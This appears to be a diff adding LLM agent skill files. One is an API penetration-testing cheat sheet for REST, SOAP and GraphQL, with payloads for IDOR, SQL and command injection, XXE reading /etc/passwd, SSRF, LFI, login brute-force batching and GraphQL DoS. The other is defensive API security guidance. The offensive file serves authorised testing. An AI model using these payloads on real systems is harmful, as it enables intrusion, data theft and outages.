Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.
|
||||
|
||||
## Inputs/Prerequisites
|
||||
|
||||
- Burp Suite or similar proxy tool
|
||||
- API wordlists (SecLists, api_wordlist)
|
||||
- Understanding of REST/GraphQL/SOAP protocols
|
||||
- Python for scripting
|
||||
- Target API endpoints and documentation (if available)
|
||||
|
||||
## Outputs/Deliverables
|
||||
|
||||
- Identified API vulnerabilities
|
||||
- IDOR exploitation proofs
|
||||
- Authentication bypass techniques
|
||||
- SQL injection points
|
||||
- Unauthorized data access documentation
|
||||
|
||||
---
|
||||
|
||||
## API Types Overview
|
||||
|
||||
| Type | Protocol | Data Format | Structure |
|
||||
|------|----------|-------------|-----------|
|
||||
| SOAP | HTTP | XML | Header + Body |
|
||||
| REST | HTTP | JSON/XML/URL | Defined endpoints |
|
||||
| GraphQL | HTTP | Custom Query | Single endpoint |
|
||||
|
||||
---
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Step 1: API Reconnaissance
|
||||
|
||||
Identify API type and enumerate endpoints:
|
||||
|
||||
```bash
|
||||
# Check for Swagger/OpenAPI documentation
|
||||
/swagger.json
|
||||
/openapi.json
|
||||
/api-docs
|
||||
/v1/api-docs
|
||||
/swagger-ui.html
|
||||
|
||||
# Use Kiterunner for API discovery
|
||||
kr scan https://target.com -w routes-large.kite
|
||||
|
||||
# Extract paths from Swagger
|
||||
python3 json2paths.py swagger.json
|
||||
```
|
||||
|
||||
### Step 2: Authentication Testing
|
||||
|
||||
```bash
|
||||
# Test different login paths
|
||||
/api/mobile/login
|
||||
/api/v3/login
|
||||
/api/magic_link
|
||||
/api/admin/login
|
||||
|
||||
# Check rate limiting on auth endpoints
|
||||
# If no rate limit → brute force possible
|
||||
|
||||
# Test mobile vs web API separately
|
||||
# Don't assume same security controls
|
||||
```
|
||||
|
||||
### Step 3: IDOR Testing
|
||||
|
||||
Insecure Direct Object Reference is the most common API vulnerability:
|
||||
|
||||
```bash
|
||||
# Basic IDOR
|
||||
GET /api/users/1234 → GET /api/users/1235
|
||||
|
||||
# Even if ID is email-based, try numeric
|
||||
/?user_id=111 instead of /?user_id=user@mail.com
|
||||
|
||||
# Test /me/orders vs /user/654321/orders
|
||||
```
|
||||
|
||||
**IDOR Bypass Techniques:**
|
||||
|
||||
```bash
|
||||
# Wrap ID in array
|
||||
{"id":111} → {"id":[111]}
|
||||
|
||||
# JSON wrap
|
||||
{"id":111} → {"id":{"id":111}}
|
||||
|
||||
# Send ID twice
|
||||
URL?id=<LEGIT>&id=<VICTIM>
|
||||
|
||||
# Wildcard injection
|
||||
{"user_id":"*"}
|
||||
|
||||
# Parameter pollution
|
||||
/api/get_profile?user_id=<victim>&user_id=<legit>
|
||||
{"user_id":<legit_id>,"user_id":<victim_id>}
|
||||
```
|
||||
|
||||
### Step 4: Injection Testing
|
||||
|
||||
**SQL Injection in JSON:**
|
||||
|
||||
```json
|
||||
{"id":"56456"} → OK
|
||||
{"id":"56456 AND 1=1#"} → OK
|
||||
{"id":"56456 AND 1=2#"} → OK
|
||||
{"id":"56456 AND 1=3#"} → ERROR (vulnerable!)
|
||||
{"id":"56456 AND sleep(15)#"} → SLEEP 15 SEC
|
||||
```
|
||||
|
||||
**Command Injection:**
|
||||
|
||||
```bash
|
||||
# Ruby on Rails
|
||||
?url=Kernel#open → ?url=|ls
|
||||
|
||||
# Linux command injection
|
||||
api.url.com/endpoint?name=file.txt;ls%20/
|
||||
```
|
||||
|
||||
**XXE Injection:**
|
||||
|
||||
```xml
|
||||
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
|
||||
```
|
||||
|
||||
**SSRF via API:**
|
||||
|
||||
```html
|
||||
<object data="http://127.0.0.1:8443"/>
|
||||
<img src="http://127.0.0.1:445"/>
|
||||
```
|
||||
|
||||
**.NET Path.Combine Vulnerability:**
|
||||
|
||||
```bash
|
||||
# If .NET app uses Path.Combine(path_1, path_2)
|
||||
# Test for path traversal
|
||||
https://example.org/download?filename=a.png
|
||||
https://example.org/download?filename=C:\inetpub\wwwroot\web.config
|
||||
https://example.org/download?filename=\\smb.dns.attacker.com\a.png
|
||||
```
|
||||
|
||||
### Step 5: Method Testing
|
||||
|
||||
```bash
|
||||
# Test all HTTP methods
|
||||
GET /api/v1/users/1
|
||||
POST /api/v1/users/1
|
||||
PUT /api/v1/users/1
|
||||
DELETE /api/v1/users/1
|
||||
PATCH /api/v1/users/1
|
||||
|
||||
# Switch content type
|
||||
Content-Type: application/json → application/xml
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## GraphQL-Specific Testing
|
||||
|
||||
### Introspection Query
|
||||
|
||||
Fetch entire backend schema:
|
||||
|
||||
```graphql
|
||||
{__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,args{name,type{name,kind}}}}}}
|
||||
```
|
||||
|
||||
**URL-encoded version:**
|
||||
|
||||
```
|
||||
/graphql?query={__schema{types{name,kind,description,fields{name}}}}
|
||||
```
|
||||
|
||||
### GraphQL IDOR
|
||||
|
||||
```graphql
|
||||
# Try accessing other user IDs
|
||||
query {
|
||||
user(id: "OTHER_USER_ID") {
|
||||
email
|
||||
password
|
||||
creditCard
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### GraphQL SQL/NoSQL Injection
|
||||
|
||||
```graphql
|
||||
mutation {
|
||||
login(input: {
|
||||
email: "test' or 1=1--"
|
||||
password: "password"
|
||||
}) {
|
||||
success
|
||||
jwt
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Rate Limit Bypass (Batching)
|
||||
|
||||
```graphql
|
||||
mutation {login(input:{email:"a@example.com" password:"password"}){success jwt}}
|
||||
mutation {login(input:{email:"b@example.com" password:"password"}){success jwt}}
|
||||
mutation {login(input:{email:"c@example.com" password:"password"}){success jwt}}
|
||||
```
|
||||
|
||||
### GraphQL DoS (Nested Queries)
|
||||
|
||||
```graphql
|
||||
query {
|
||||
posts {
|
||||
comments {
|
||||
user {
|
||||
posts {
|
||||
comments {
|
||||
user {
|
||||
posts { ... }
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### GraphQL XSS
|
||||
|
||||
```bash
|
||||
# XSS via GraphQL endpoint
|
||||
http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}
|
||||
|
||||
# URL-encoded XSS
|
||||
http://target.com/example?id=%C/script%E%Cscript%Ealert('XSS')%C/script%E
|
||||
```
|
||||
|
||||
### GraphQL Tools
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| GraphCrawler | Schema discovery |
|
||||
| graphw00f | Fingerprinting |
|
||||
| clairvoyance | Schema reconstruction |
|
||||
| InQL | Burp extension |
|
||||
| GraphQLmap | Exploitation |
|
||||
|
||||
---
|
||||
|
||||
## Endpoint Bypass Techniques
|
||||
|
||||
When receiving 403/401, try these bypasses:
|
||||
|
||||
```bash
|
||||
# Original blocked request
|
||||
/api/v1/users/sensitivedata → 403
|
||||
|
||||
# Bypass attempts
|
||||
/api/v1/users/sensitivedata.json
|
||||
/api/v1/users/sensitivedata?
|
||||
/api/v1/users/sensitivedata/
|
||||
/api/v1/users/sensitivedata??
|
||||
/api/v1/users/sensitivedata%20
|
||||
/api/v1/users/sensitivedata%09
|
||||
/api/v1/users/sensitivedata#
|
||||
/api/v1/users/sensitivedata&details
|
||||
/api/v1/users/..;/sensitivedata
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Output Exploitation
|
||||
|
||||
### PDF Export Attacks
|
||||
|
||||
```html
|
||||
<!-- LFI via PDF export -->
|
||||
<iframe src="file:///etc/passwd" height=1000 width=800>
|
||||
|
||||
<!-- SSRF via PDF export -->
|
||||
<object data="http://127.0.0.1:8443"/>
|
||||
|
||||
<!-- Port scanning -->
|
||||
<img src="http://127.0.0.1:445"/>
|
||||
|
||||
<!-- IP disclosure -->
|
||||
<img src="https://iplogger.com/yourcode.gif"/>
|
||||
```
|
||||
|
||||
### DoS via Limits
|
||||
|
||||
```bash
|
||||
# Normal request
|
||||
/api/news?limit=100
|
||||
|
||||
# DoS attempt
|
||||
/api/news?limit=9999999999
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Common API Vulnerabilities Checklist
|
||||
|
||||
| Vulnerability | Description |
|
||||
|---------------|-------------|
|
||||
| API Exposure | Unprotected endpoints exposed publicly |
|
||||
| Misconfigured Caching | Sensitive data cached incorrectly |
|
||||
| Exposed Tokens | API keys/tokens in responses or URLs |
|
||||
| JWT Weaknesses | Weak signing, no expiration, algorithm confusion |
|
||||
| IDOR / BOLA | Broken Object Level Authorization |
|
||||
| Undocumented Endpoints | Hidden admin/debug endpoints |
|
||||
| Different Versions | Security gaps in older API versions |
|
||||
| Rate Limiting | Missing or bypassable rate limits |
|
||||
| Race Conditions | TOCTOU vulnerabilities |
|
||||
| XXE Injection | XML parser exploitation |
|
||||
| Content Type Issues | Switching between JSON/XML |
|
||||
| HTTP Method Tampering | GET→DELETE/PUT abuse |
|
||||
|
||||
---
|
||||
|
||||
## Quick Reference
|
||||
|
||||
| Vulnerability | Test Payload | Risk |
|
||||
|---------------|--------------|------|
|
||||
| IDOR | Change user_id parameter | High |
|
||||
| SQLi | `' OR 1=1--` in JSON | Critical |
|
||||
| Command Injection | `; ls /` | Critical |
|
||||
| XXE | DOCTYPE with ENTITY | High |
|
||||
| SSRF | Internal IP in params | High |
|
||||
| Rate Limit Bypass | Batch requests | Medium |
|
||||
| Method Tampering | GET→DELETE | High |
|
||||
|
||||
---
|
||||
|
||||
## Tools Reference
|
||||
|
||||
| Category | Tool | URL |
|
||||
|----------|------|-----|
|
||||
| API Fuzzing | Fuzzapi | github.com/Fuzzapi/fuzzapi |
|
||||
| API Fuzzing | API-fuzzer | github.com/Fuzzapi/API-fuzzer |
|
||||
| API Fuzzing | Astra | github.com/flipkart-incubator/Astra |
|
||||
| API Security | apicheck | github.com/BBVA/apicheck |
|
||||
| API Discovery | Kiterunner | github.com/assetnote/kiterunner |
|
||||
| API Discovery | openapi_security_scanner | github.com/ngalongc/openapi_security_scanner |
|
||||
| API Toolkit | APIKit | github.com/API-Security/APIKit |
|
||||
| API Keys | API Guesser | api-guesser.netlify.app |
|
||||
| GUID | GUID Guesser | gist.github.com/DanaEpp/8c6803e542f094da5c4079622f9b4d18 |
|
||||
| GraphQL | InQL | github.com/doyensec/inql |
|
||||
| GraphQL | GraphCrawler | github.com/gsmith257-cyber/GraphCrawler |
|
||||
| GraphQL | graphw00f | github.com/dolevf/graphw00f |
|
||||
| GraphQL | clairvoyance | github.com/nikitastupin/clairvoyance |
|
||||
| GraphQL | batchql | github.com/assetnote/batchql |
|
||||
| GraphQL | graphql-cop | github.com/dolevf/graphql-cop |
|
||||
| Wordlists | SecLists | github.com/danielmiessler/SecLists |
|
||||
| Swagger Parser | Swagger-EZ | rhinosecuritylabs.github.io/Swagger-EZ |
|
||||
| Swagger Routes | swagroutes | github.com/amalmurali47/swagroutes |
|
||||
| API Mindmap | MindAPI | dsopas.github.io/MindAPI/play |
|
||||
| JSON Paths | json2paths | github.com/s0md3v/dump/tree/master/json2paths |
|
||||
|
||||
---
|
||||
|
||||
## Constraints
|
||||
|
||||
**Must:**
|
||||
- Test mobile, web, and developer APIs separately
|
||||
- Check all API versions (/v1, /v2, /v3)
|
||||
- Validate both authenticated and unauthenticated access
|
||||
|
||||
**Must Not:**
|
||||
- Assume same security controls across API versions
|
||||
- Skip testing undocumented endpoints
|
||||
- Ignore rate limiting checks
|
||||
|
||||
**Should:**
|
||||
- Add `X-Requested-With: XMLHttpRequest` header to simulate frontend
|
||||
- Check archive.org for historical API endpoints
|
||||
- Test for race conditions on sensitive operations
|
||||
|
||||
---
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: IDOR Exploitation
|
||||
|
||||
```bash
|
||||
# Original request (own data)
|
||||
GET /api/v1/invoices/12345
|
||||
Authorization: Bearer <token>
|
||||
|
||||
# Modified request (other user's data)
|
||||
GET /api/v1/invoices/12346
|
||||
Authorization: Bearer <token>
|
||||
|
||||
# Response reveals other user's invoice data
|
||||
```
|
||||
|
||||
### Example 2: GraphQL Introspection
|
||||
|
||||
```bash
|
||||
curl -X POST https://target.com/graphql \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{"query":"{__schema{types{name,fields{name}}}}"}'
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Issue | Solution |
|
||||
|-------|----------|
|
||||
| API returns nothing | Add `X-Requested-With: XMLHttpRequest` header |
|
||||
| 401 on all endpoints | Try adding `?user_id=1` parameter |
|
||||
| GraphQL introspection disabled | Use clairvoyance for schema reconstruction |
|
||||
| Rate limited | Use IP rotation or batch requests |
|
||||
| Can't find endpoints | Check Swagger, archive.org, JS files |
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
910
packages/llm/skills/api-security-best-practices/SKILL.md
Normal file
910
packages/llm/skills/api-security-best-practices/SKILL.md
Normal file
@ -0,0 +1,910 @@
|
||||
---
|
||||
name: api-security-best-practices
|
||||
description: "Implement secure API design patterns including authentication, authorization, input validation, rate limiting, and protection against common API vulnerabilities"
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# API Security Best Practices
|
||||
|
||||
## Overview
|
||||
|
||||
Guide developers in building secure APIs by implementing authentication, authorization, input validation, rate limiting, and protection against common vulnerabilities. This skill covers security patterns for REST, GraphQL, and WebSocket APIs.
|
||||
|
||||
## When to Use This Skill
|
||||
|
||||
- Use when designing new API endpoints
|
||||
- Use when securing existing APIs
|
||||
- Use when implementing authentication and authorization
|
||||
- Use when protecting against API attacks (injection, DDoS, etc.)
|
||||
- Use when conducting API security reviews
|
||||
- Use when preparing for security audits
|
||||
- Use when implementing rate limiting and throttling
|
||||
- Use when handling sensitive data in APIs
|
||||
|
||||
## How It Works
|
||||
|
||||
### Step 1: Authentication & Authorization
|
||||
|
||||
I'll help you implement secure authentication:
|
||||
- Choose authentication method (JWT, OAuth 2.0, API keys)
|
||||
- Implement token-based authentication
|
||||
- Set up role-based access control (RBAC)
|
||||
- Secure session management
|
||||
- Implement multi-factor authentication (MFA)
|
||||
|
||||
### Step 2: Input Validation & Sanitization
|
||||
|
||||
Protect against injection attacks:
|
||||
- Validate all input data
|
||||
- Sanitize user inputs
|
||||
- Use parameterized queries
|
||||
- Implement request schema validation
|
||||
- Prevent SQL injection, XSS, and command injection
|
||||
|
||||
### Step 3: Rate Limiting & Throttling
|
||||
|
||||
Prevent abuse and DDoS attacks:
|
||||
- Implement rate limiting per user/IP
|
||||
- Set up API throttling
|
||||
- Configure request quotas
|
||||
- Handle rate limit errors gracefully
|
||||
- Monitor for suspicious activity
|
||||
|
||||
### Step 4: Data Protection
|
||||
|
||||
Secure sensitive data:
|
||||
- Encrypt data in transit (HTTPS/TLS)
|
||||
- Encrypt sensitive data at rest
|
||||
- Implement proper error handling (no data leaks)
|
||||
- Sanitize error messages
|
||||
- Use secure headers
|
||||
|
||||
### Step 5: API Security Testing
|
||||
|
||||
Verify security implementation:
|
||||
- Test authentication and authorization
|
||||
- Perform penetration testing
|
||||
- Check for common vulnerabilities (OWASP API Top 10)
|
||||
- Validate input handling
|
||||
- Test rate limiting
|
||||
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Implementing JWT Authentication
|
||||
|
||||
```markdown
|
||||
## Secure JWT Authentication Implementation
|
||||
|
||||
### Authentication Flow
|
||||
|
||||
1. User logs in with credentials
|
||||
2. Server validates credentials
|
||||
3. Server generates JWT token
|
||||
4. Client stores token securely
|
||||
5. Client sends token with each request
|
||||
6. Server validates token
|
||||
|
||||
### Implementation
|
||||
|
||||
#### 1. Generate Secure JWT Tokens
|
||||
|
||||
\`\`\`javascript
|
||||
// auth.js
|
||||
const jwt = require('jsonwebtoken');
|
||||
const bcrypt = require('bcrypt');
|
||||
|
||||
// Login endpoint
|
||||
app.post('/api/auth/login', async (req, res) => {
|
||||
try {
|
||||
const { email, password } = req.body;
|
||||
|
||||
// Validate input
|
||||
if (!email || !password) {
|
||||
return res.status(400).json({
|
||||
error: 'Email and password are required'
|
||||
});
|
||||
}
|
||||
|
||||
// Find user
|
||||
const user = await db.user.findUnique({
|
||||
where: { email }
|
||||
});
|
||||
|
||||
if (!user) {
|
||||
// Don't reveal if user exists
|
||||
return res.status(401).json({
|
||||
error: 'Invalid credentials'
|
||||
});
|
||||
}
|
||||
|
||||
// Verify password
|
||||
const validPassword = await bcrypt.compare(
|
||||
password,
|
||||
user.passwordHash
|
||||
);
|
||||
|
||||
if (!validPassword) {
|
||||
return res.status(401).json({
|
||||
error: 'Invalid credentials'
|
||||
});
|
||||
}
|
||||
|
||||
// Generate JWT token
|
||||
const token = jwt.sign(
|
||||
{
|
||||
userId: user.id,
|
||||
email: user.email,
|
||||
role: user.role
|
||||
},
|
||||
process.env.JWT_SECRET,
|
||||
{
|
||||
expiresIn: '1h',
|
||||
issuer: 'your-app',
|
||||
audience: 'your-app-users'
|
||||
}
|
||||
);
|
||||
|
||||
// Generate refresh token
|
||||
const refreshToken = jwt.sign(
|
||||
{ userId: user.id },
|
||||
process.env.JWT_REFRESH_SECRET,
|
||||
{ expiresIn: '7d' }
|
||||
);
|
||||
|
||||
// Store refresh token in database
|
||||
await db.refreshToken.create({
|
||||
data: {
|
||||
token: refreshToken,
|
||||
userId: user.id,
|
||||
expiresAt: new Date(Date.now() + 7 * 24 * 60 * 60 * 1000)
|
||||
}
|
||||
});
|
||||
|
||||
res.json({
|
||||
token,
|
||||
refreshToken,
|
||||
expiresIn: 3600
|
||||
});
|
||||
|
||||
} catch (error) {
|
||||
console.error('Login error:', error);
|
||||
res.status(500).json({
|
||||
error: 'An error occurred during login'
|
||||
});
|
||||
}
|
||||
});
|
||||
\`\`\`
|
||||
|
||||
#### 2. Verify JWT Tokens (Middleware)
|
||||
|
||||
\`\`\`javascript
|
||||
// middleware/auth.js
|
||||
const jwt = require('jsonwebtoken');
|
||||
|
||||
function authenticateToken(req, res, next) {
|
||||
// Get token from header
|
||||
const authHeader = req.headers['authorization'];
|
||||
const token = authHeader && authHeader.split(' ')[1]; // Bearer TOKEN
|
||||
|
||||
if (!token) {
|
||||
return res.status(401).json({
|
||||
error: 'Access token required'
|
||||
});
|
||||
}
|
||||
|
||||
// Verify token
|
||||
jwt.verify(
|
||||
token,
|
||||
process.env.JWT_SECRET,
|
||||
{
|
||||
issuer: 'your-app',
|
||||
audience: 'your-app-users'
|
||||
},
|
||||
(err, user) => {
|
||||
if (err) {
|
||||
if (err.name === 'TokenExpiredError') {
|
||||
return res.status(401).json({
|
||||
error: 'Token expired'
|
||||
});
|
||||
}
|
||||
return res.status(403).json({
|
||||
error: 'Invalid token'
|
||||
});
|
||||
}
|
||||
|
||||
// Attach user to request
|
||||
req.user = user;
|
||||
next();
|
||||
}
|
||||
);
|
||||
}
|
||||
|
||||
module.exports = { authenticateToken };
|
||||
\`\`\`
|
||||
|
||||
#### 3. Protect Routes
|
||||
|
||||
\`\`\`javascript
|
||||
const { authenticateToken } = require('./middleware/auth');
|
||||
|
||||
// Protected route
|
||||
app.get('/api/user/profile', authenticateToken, async (req, res) => {
|
||||
try {
|
||||
const user = await db.user.findUnique({
|
||||
where: { id: req.user.userId },
|
||||
select: {
|
||||
id: true,
|
||||
email: true,
|
||||
name: true,
|
||||
// Don't return passwordHash
|
||||
}
|
||||
});
|
||||
|
||||
res.json(user);
|
||||
} catch (error) {
|
||||
res.status(500).json({ error: 'Server error' });
|
||||
}
|
||||
});
|
||||
\`\`\`
|
||||
|
||||
#### 4. Implement Token Refresh
|
||||
|
||||
\`\`\`javascript
|
||||
app.post('/api/auth/refresh', async (req, res) => {
|
||||
const { refreshToken } = req.body;
|
||||
|
||||
if (!refreshToken) {
|
||||
return res.status(401).json({
|
||||
error: 'Refresh token required'
|
||||
});
|
||||
}
|
||||
|
||||
try {
|
||||
// Verify refresh token
|
||||
const decoded = jwt.verify(
|
||||
refreshToken,
|
||||
process.env.JWT_REFRESH_SECRET
|
||||
);
|
||||
|
||||
// Check if refresh token exists in database
|
||||
const storedToken = await db.refreshToken.findFirst({
|
||||
where: {
|
||||
token: refreshToken,
|
||||
userId: decoded.userId,
|
||||
expiresAt: { gt: new Date() }
|
||||
}
|
||||
});
|
||||
|
||||
if (!storedToken) {
|
||||
return res.status(403).json({
|
||||
error: 'Invalid refresh token'
|
||||
});
|
||||
}
|
||||
|
||||
// Generate new access token
|
||||
const user = await db.user.findUnique({
|
||||
where: { id: decoded.userId }
|
||||
});
|
||||
|
||||
const newToken = jwt.sign(
|
||||
{
|
||||
userId: user.id,
|
||||
email: user.email,
|
||||
role: user.role
|
||||
},
|
||||
process.env.JWT_SECRET,
|
||||
{ expiresIn: '1h' }
|
||||
);
|
||||
|
||||
res.json({
|
||||
token: newToken,
|
||||
expiresIn: 3600
|
||||
});
|
||||
|
||||
} catch (error) {
|
||||
res.status(403).json({
|
||||
error: 'Invalid refresh token'
|
||||
});
|
||||
}
|
||||
});
|
||||
\`\`\`
|
||||
|
||||
### Security Best Practices
|
||||
|
||||
- ✅ Use strong JWT secrets (256-bit minimum)
|
||||
- ✅ Set short expiration times (1 hour for access tokens)
|
||||
- ✅ Implement refresh tokens for long-lived sessions
|
||||
- ✅ Store refresh tokens in database (can be revoked)
|
||||
- ✅ Use HTTPS only
|
||||
- ✅ Don't store sensitive data in JWT payload
|
||||
- ✅ Validate token issuer and audience
|
||||
- ✅ Implement token blacklisting for logout
|
||||
```
|
||||
|
||||
|
||||
### Example 2: Input Validation and SQL Injection Prevention
|
||||
|
||||
```markdown
|
||||
## Preventing SQL Injection and Input Validation
|
||||
|
||||
### The Problem
|
||||
|
||||
**❌ Vulnerable Code:**
|
||||
\`\`\`javascript
|
||||
// NEVER DO THIS - SQL Injection vulnerability
|
||||
app.get('/api/users/:id', async (req, res) => {
|
||||
const userId = req.params.id;
|
||||
|
||||
// Dangerous: User input directly in query
|
||||
const query = \`SELECT * FROM users WHERE id = '\${userId}'\`;
|
||||
const user = await db.query(query);
|
||||
|
||||
res.json(user);
|
||||
});
|
||||
|
||||
// Attack example:
|
||||
// GET /api/users/1' OR '1'='1
|
||||
// Returns all users!
|
||||
\`\`\`
|
||||
|
||||
### The Solution
|
||||
|
||||
#### 1. Use Parameterized Queries
|
||||
|
||||
\`\`\`javascript
|
||||
// ✅ Safe: Parameterized query
|
||||
app.get('/api/users/:id', async (req, res) => {
|
||||
const userId = req.params.id;
|
||||
|
||||
// Validate input first
|
||||
if (!userId || !/^\d+$/.test(userId)) {
|
||||
return res.status(400).json({
|
||||
error: 'Invalid user ID'
|
||||
});
|
||||
}
|
||||
|
||||
// Use parameterized query
|
||||
const user = await db.query(
|
||||
'SELECT id, email, name FROM users WHERE id = $1',
|
||||
[userId]
|
||||
);
|
||||
|
||||
if (!user) {
|
||||
return res.status(404).json({
|
||||
error: 'User not found'
|
||||
});
|
||||
}
|
||||
|
||||
res.json(user);
|
||||
});
|
||||
\`\`\`
|
||||
|
||||
#### 2. Use ORM with Proper Escaping
|
||||
|
||||
\`\`\`javascript
|
||||
// ✅ Safe: Using Prisma ORM
|
||||
app.get('/api/users/:id', async (req, res) => {
|
||||
const userId = parseInt(req.params.id);
|
||||
|
||||
if (isNaN(userId)) {
|
||||
return res.status(400).json({
|
||||
error: 'Invalid user ID'
|
||||
});
|
||||
}
|
||||
|
||||
const user = await prisma.user.findUnique({
|
||||
where: { id: userId },
|
||||
select: {
|
||||
id: true,
|
||||
email: true,
|
||||
name: true,
|
||||
// Don't select sensitive fields
|
||||
}
|
||||
});
|
||||
|
||||
if (!user) {
|
||||
return res.status(404).json({
|
||||
error: 'User not found'
|
||||
});
|
||||
}
|
||||
|
||||
res.json(user);
|
||||
});
|
||||
\`\`\`
|
||||
|
||||
#### 3. Implement Request Validation with Zod
|
||||
|
||||
\`\`\`javascript
|
||||
const { z } = require('zod');
|
||||
|
||||
// Define validation schema
|
||||
const createUserSchema = z.object({
|
||||
email: z.string().email('Invalid email format'),
|
||||
password: z.string()
|
||||
.min(8, 'Password must be at least 8 characters')
|
||||
.regex(/[A-Z]/, 'Password must contain uppercase letter')
|
||||
.regex(/[a-z]/, 'Password must contain lowercase letter')
|
||||
.regex(/[0-9]/, 'Password must contain number'),
|
||||
name: z.string()
|
||||
.min(2, 'Name must be at least 2 characters')
|
||||
.max(100, 'Name too long'),
|
||||
age: z.number()
|
||||
.int('Age must be an integer')
|
||||
.min(18, 'Must be 18 or older')
|
||||
.max(120, 'Invalid age')
|
||||
.optional()
|
||||
});
|
||||
|
||||
// Validation middleware
|
||||
function validateRequest(schema) {
|
||||
return (req, res, next) => {
|
||||
try {
|
||||
schema.parse(req.body);
|
||||
next();
|
||||
} catch (error) {
|
||||
res.status(400).json({
|
||||
error: 'Validation failed',
|
||||
details: error.errors
|
||||
});
|
||||
}
|
||||
};
|
||||
}
|
||||
|
||||
// Use validation
|
||||
app.post('/api/users',
|
||||
validateRequest(createUserSchema),
|
||||
async (req, res) => {
|
||||
// Input is validated at this point
|
||||
const { email, password, name, age } = req.body;
|
||||
|
||||
// Hash password
|
||||
const passwordHash = await bcrypt.hash(password, 10);
|
||||
|
||||
// Create user
|
||||
const user = await prisma.user.create({
|
||||
data: {
|
||||
email,
|
||||
passwordHash,
|
||||
name,
|
||||
age
|
||||
}
|
||||
});
|
||||
|
||||
// Don't return password hash
|
||||
const { passwordHash: _, ...userWithoutPassword } = user;
|
||||
res.status(201).json(userWithoutPassword);
|
||||
}
|
||||
);
|
||||
\`\`\`
|
||||
|
||||
#### 4. Sanitize Output to Prevent XSS
|
||||
|
||||
\`\`\`javascript
|
||||
const DOMPurify = require('isomorphic-dompurify');
|
||||
|
||||
app.post('/api/comments', authenticateToken, async (req, res) => {
|
||||
const { content } = req.body;
|
||||
|
||||
// Validate
|
||||
if (!content || content.length > 1000) {
|
||||
return res.status(400).json({
|
||||
error: 'Invalid comment content'
|
||||
});
|
||||
}
|
||||
|
||||
// Sanitize HTML to prevent XSS
|
||||
const sanitizedContent = DOMPurify.sanitize(content, {
|
||||
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a'],
|
||||
ALLOWED_ATTR: ['href']
|
||||
});
|
||||
|
||||
const comment = await prisma.comment.create({
|
||||
data: {
|
||||
content: sanitizedContent,
|
||||
userId: req.user.userId
|
||||
}
|
||||
});
|
||||
|
||||
res.status(201).json(comment);
|
||||
});
|
||||
\`\`\`
|
||||
|
||||
### Validation Checklist
|
||||
|
||||
- [ ] Validate all user inputs
|
||||
- [ ] Use parameterized queries or ORM
|
||||
- [ ] Validate data types (string, number, email, etc.)
|
||||
- [ ] Validate data ranges (min/max length, value ranges)
|
||||
- [ ] Sanitize HTML content
|
||||
- [ ] Escape special characters
|
||||
- [ ] Validate file uploads (type, size, content)
|
||||
- [ ] Use allowlists, not blocklists
|
||||
```
|
||||
|
||||
|
||||
### Example 3: Rate Limiting and DDoS Protection
|
||||
|
||||
```markdown
|
||||
## Implementing Rate Limiting
|
||||
|
||||
### Why Rate Limiting?
|
||||
|
||||
- Prevent brute force attacks
|
||||
- Protect against DDoS
|
||||
- Prevent API abuse
|
||||
- Ensure fair usage
|
||||
- Reduce server costs
|
||||
|
||||
### Implementation with Express Rate Limit
|
||||
|
||||
\`\`\`javascript
|
||||
const rateLimit = require('express-rate-limit');
|
||||
const RedisStore = require('rate-limit-redis');
|
||||
const Redis = require('ioredis');
|
||||
|
||||
// Create Redis client
|
||||
const redis = new Redis({
|
||||
host: process.env.REDIS_HOST,
|
||||
port: process.env.REDIS_PORT
|
||||
});
|
||||
|
||||
// General API rate limit
|
||||
const apiLimiter = rateLimit({
|
||||
store: new RedisStore({
|
||||
client: redis,
|
||||
prefix: 'rl:api:'
|
||||
}),
|
||||
windowMs: 15 * 60 * 1000, // 15 minutes
|
||||
max: 100, // 100 requests per window
|
||||
message: {
|
||||
error: 'Too many requests, please try again later',
|
||||
retryAfter: 900 // seconds
|
||||
},
|
||||
standardHeaders: true, // Return rate limit info in headers
|
||||
legacyHeaders: false,
|
||||
// Custom key generator (by user ID or IP)
|
||||
keyGenerator: (req) => {
|
||||
return req.user?.userId || req.ip;
|
||||
}
|
||||
});
|
||||
|
||||
// Strict rate limit for authentication endpoints
|
||||
const authLimiter = rateLimit({
|
||||
store: new RedisStore({
|
||||
client: redis,
|
||||
prefix: 'rl:auth:'
|
||||
}),
|
||||
windowMs: 15 * 60 * 1000, // 15 minutes
|
||||
max: 5, // Only 5 login attempts per 15 minutes
|
||||
skipSuccessfulRequests: true, // Don't count successful logins
|
||||
message: {
|
||||
error: 'Too many login attempts, please try again later',
|
||||
retryAfter: 900
|
||||
}
|
||||
});
|
||||
|
||||
// Apply rate limiters
|
||||
app.use('/api/', apiLimiter);
|
||||
app.use('/api/auth/login', authLimiter);
|
||||
app.use('/api/auth/register', authLimiter);
|
||||
|
||||
// Custom rate limiter for expensive operations
|
||||
const expensiveLimiter = rateLimit({
|
||||
windowMs: 60 * 60 * 1000, // 1 hour
|
||||
max: 10, // 10 requests per hour
|
||||
message: {
|
||||
error: 'Rate limit exceeded for this operation'
|
||||
}
|
||||
});
|
||||
|
||||
app.post('/api/reports/generate',
|
||||
authenticateToken,
|
||||
expensiveLimiter,
|
||||
async (req, res) => {
|
||||
// Expensive operation
|
||||
}
|
||||
);
|
||||
\`\`\`
|
